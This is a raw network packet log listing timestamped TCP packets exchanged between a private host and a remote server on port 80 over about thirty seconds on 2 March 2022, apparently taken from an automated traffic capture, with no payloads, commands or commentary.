Mar 2, 2022 16:18:16.394898891 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:16.394922972 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:16.394942999 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:16.395035028 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:16.535963058 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:16.536114931 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:16.556196928 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:16.556260109 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:16.556278944 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:16.556296110 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:16.556391001 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:16.556426048 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:22.052618027 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:22.052763939 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:23.038024902 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:23.038161993 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:23.038244963 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:23.038286924 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:23.038289070 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:23.038326979 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:23.038328886 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:23.038336992 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:23.038341999 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:23.038367987 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:23.038369894 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:23.038413048 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:23.038434029 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:23.038455963 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:23.038464069 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:23.038496971 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:23.038513899 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:23.038538933 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:23.038556099 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:23.038582087 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:23.038598061 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:23.038629055 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:23.044672966 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:23.053440094 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:23.053530931 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:23.053592920 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:23.053699017 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:23.053746939 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:23.053755999 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:23.054580927 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:23.054729939 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:23.059130907 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:23.059252024 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:23.272258043 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:23.272309065 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:23.272349119 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:23.272386074 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:23.272391081 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:23.272430897 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:23.272432089 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:23.272439957 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:23.272445917 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:23.272473097 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:23.272484064 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:23.272514105 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:23.272526979 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:23.272553921 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:23.272562981 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:23.272602081 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:23.303505898 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:23.303558111 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:23.303600073 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:23.303641081 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:23.303649902 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:23.303682089 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:23.303689003 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:23.303695917 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:23.303702116 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:23.303724051 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:23.303742886 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:23.303765059 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:23.303785086 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:23.303822994 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:23.318980932 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:23.319113970 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:23.319117069 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:23.319205999 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:23.361696005 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:23.361763954 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:23.361821890 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:23.361854076 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:23.361917973 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:23.361926079 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:23.428587914 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:23.428695917 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:23.428747892 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:23.428790092 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:23.428788900 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:23.428828955 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:23.428829908 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:23.428837061 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:23.428843021 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:23.428870916 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:23.428900003 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:23.428908110 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:23.428944111 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:23.428978920 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:23.555954933 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:23.556031942 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:23.556051016 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:23.556067944 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:23.556092024 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:23.556135893 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:23.556144953 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:23.556193113 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:23.556257010 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:29.082531929 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:29.082720995 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:30.510401964 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:30.510435104 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:30.510476112 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:30.510493994 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:30.510512114 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:30.510529041 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:30.510552883 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:30.510585070 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:30.510593891 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:30.510690928 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:30.510709047 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:30.510725975 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:30.510736942 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:30.510745049 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:30.510766029 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:30.510782003 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:30.511163950 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:30.511229992 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:30.511509895 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:30.532361031 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:30.532401085 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:30.532413006 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:30.532426119 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:30.532440901 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:30.532623053 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:30.810473919 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:30.810513973 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:30.810537100 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:30.810555935 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:30.810599089 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:30.810607910 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:30.820450068 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:30.820491076 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:30.820513964 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:30.820563078 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:30.820594072 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:30.820732117 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:30.820756912 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:30.820777893 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:30.820795059 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:30.834919930 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:30.835007906 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:30.835032940 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:30.835062027 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:30.835078001 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:30.835083961 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:30.835093975 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:30.835108995 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:30.835109949 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:30.835131884 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:30.835155964 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:30.835165977 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:30.835203886 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:30.835222006 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:30.868338108 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:30.868429899 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:30.868515015 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:30.868547916 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:30.897305965 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:30.897340059 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:30.897353888 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:30.897495031 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:31.068080902 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:31.068173885 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:31.068265915 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:31.068293095 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:31.068316936 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:31.068316936 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:31.068329096 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:31.068341970 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:31.068351984 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:31.068365097 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:31.068381071 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:31.068391085 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:31.068397999 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:31.068424940 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:31.171180010 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:31.171220064 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:31.171243906 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:31.171267033 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:31.171292067 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:31.171308994 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:31.171331882 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:31.171335936 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:36.491293907 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:36.491476059 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:38.219166040 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:38.219214916 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:38.219264030 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:38.219294071 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:38.224482059 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:38.224534988 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:38.224567890 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:38.224591017 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:38.224602938 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:38.224622011 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:38.224632025 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:38.224644899 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:38.224669933 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:38.224678993 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:38.224689007 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:38.224709034 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:38.224720955 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:38.224737883 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:38.224749088 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:38.224778891 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:38.225107908 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:38.242849112 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:38.242892981 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:38.242909908 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:38.242925882 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:38.242943048 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:38.243174076 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:38.509489059 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:38.509557962 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:38.509565115 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:38.509584904 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:38.509605885 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:38.509655952 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:38.522103071 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:38.522141933 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:38.522172928 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:38.522198915 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:38.522202969 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:38.522222042 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:38.522231102 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:38.522234917 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:38.522238016 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:38.522247076 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:38.522260904 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:38.522272110 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:38.522286892 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:38.522296906 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:38.522320986 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:38.522336960 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:38.522341967 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:38.522342920 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:38.522363901 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:38.522372007 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:38.522377968 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:38.522387981 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:38.522403002 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:38.522428989 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:38.522550106 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:38.540460110 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:38.540538073 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:38.540582895 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:38.540604115 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:38.621123075 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:38.621206045 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:38.621231079 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:38.621251106 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:38.621314049 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:38.727267981 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:38.727336884 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:38.727372885 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:38.727406979 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:38.727446079 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:38.727473974 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:38.727498055 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:38.727569103 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:38.727629900 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:38.857552052 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:38.857597113 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:38.857635975 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:38.857660055 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:38.857685089 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:38.857774019 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:38.861802101 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:43.867544889 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:43.867727041 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:45.836647987 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:45.836687088 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:45.836713076 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:45.836736917 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:45.836738110 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:45.836764097 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:45.836765051 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:45.836771011 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:45.836775064 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:45.836790085 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:45.836817980 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:45.836828947 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:45.836860895 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:45.836884975 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:45.836910009 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:45.836937904 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:45.836951971 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:45.836952925 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:45.836975098 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:45.836983919 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:45.836991072 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:45.837009907 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:45.837229013 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:45.853326082 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:45.853364944 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:45.853390932 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:45.853415012 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:45.853440046 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:45.853461027 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:45.853492022 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:45.853497028 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:45.853502989 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:46.120635033 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:46.120666027 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:46.120678902 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:46.120861053 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:46.147639990 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:46.147685051 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:46.147708893 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:46.147733927 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:46.147758007 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:46.147779942 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:46.147804022 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:46.147828102 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:46.147871017 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:46.147910118 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:46.147993088 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:46.148019075 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:46.148042917 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:46.148058891 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:46.148067951 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:46.148068905 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:46.148102045 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:46.148108959 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:46.148600101 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:46.165982008 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:46.166023970 CET	80	49167	212.64.200.154	192.168.2.22
